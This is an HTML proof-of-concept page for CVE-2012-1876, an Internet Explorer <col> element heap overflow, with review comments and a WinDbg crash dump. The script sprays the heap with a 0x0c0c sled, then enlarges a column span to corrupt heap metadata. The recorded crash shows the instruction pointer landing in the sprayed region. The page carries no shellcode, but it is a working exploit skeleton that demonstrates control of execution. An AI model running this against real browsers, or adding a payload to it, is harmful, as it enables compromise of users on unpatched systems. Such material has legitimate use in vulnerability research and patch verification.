<html>
<head>
<title>CVE-2012-1876 PoC</title>
</head>
<body onload="_crash()">
<!--
  Trigger layout for the PoC. table-layout: fixed together with a <colgroup>
  width of 2021161 (2021161 * 100 = 0x0c0c0c04, see the script comment below)
  is the setup; _crash() later raises the span of #cl from 2 to 400.
  NOTE(review): the missing doctype and the bare markup are presumably
  deliberate (legacy/quirks rendering in IE). Keep this block as-is -
  reformatting or adding elements may change the allocation pattern that the
  crash dump in the script was recorded against.
-->
<TABLE style="table-layout: fixed;">
<colgroup id="cg" width="2021161">
<col id="cl" span="2">
<col>
</colgroup>
<TR>
<TD>XXXX</TD>
</TR>
</TABLE>
<script>
/*******
CVE-2012-1876 IE <col> element heap overflow PoC (crash only: no payload, the spray is an `or al,0Ch` sled followed by 0x4141 padding)
Canberk Bolat - cbolat.blogspot.com
cg's width = 2021161 (2021161 * 100 = 0x0c0c0c04). That value ends up in a heap block's Blink->Flink, as the !heap output below shows, so the corrupted list entry points into the sprayed 0x0c0c0c0c region.
(1014.1158): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c04 ebx=02e2bae8 ecx=008cdf88 edx=0c0c0c0c esi=008de480 edi=008983e0
eip=0c0c0c0c esp=02e2b9fc ebp=02e2ba9c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
0c0c0c0c 0c0c or al,0Ch
1:019> !heap -x 0c0c0c0c
List corrupted: (Flink->Blink = 0c0c0c04) != (Block = 00890850)
HEAP 00830000 (Seg 00830000) At 00890848 Error: block list entry corrupted
List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 0089d458)
HEAP 00830000 (Seg 00830000) At 0089d450 Error: block list entry corrupted
List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 008a2f38)
HEAP 00830000 (Seg 00830000) At 008a2f30 Error: block list entry corrupted
ERROR: Block 008ccf90 previous size 36d3 does not match previous block size 12
HEAP 00830000 (Seg 00830000) At 008ccf90 Error: invalid block Previous
**********/
// Resolved at parse time: this script sits after the <table>, so #cl (the
// <col span="2"> inside the 2021161-wide colgroup) already exists. _crash(),
// run from <body onload>, mutates this element to trigger the bug.
var targetObj = document.getElementById("cl");
function spray() {
for(S="\\u0c0c",k=[],y=0;y++<197;)y<20?S+=S:k[y]=["\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c" + S.substr(60) +"\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141"].join("")
}
/*
 * onload handler (<body onload="_crash()">). Sprays the heap first, then
 * mutates the <col> whose parent colgroup carries the oversized width. The
 * span change is the last statement before the access violation recorded in
 * the header comment, where eip=0c0c0c0c lands in the sprayed sled; there is
 * no payload, so on an affected, unpatched IE this is a crash / heap
 * corruption demonstration (fixed by Microsoft in MS12-037 - verify against
 * the advisory before citing).
 */
function _crash() {
    spray();
    var col = targetObj;
    // The original had a commented-out alert("OK") here as a manual pause
    // between spray and trigger.
    col.chOff = 10;
    col.span = 400; // presumably the write that corrupts the adjacent heap block
}
</script>
</body>
</html>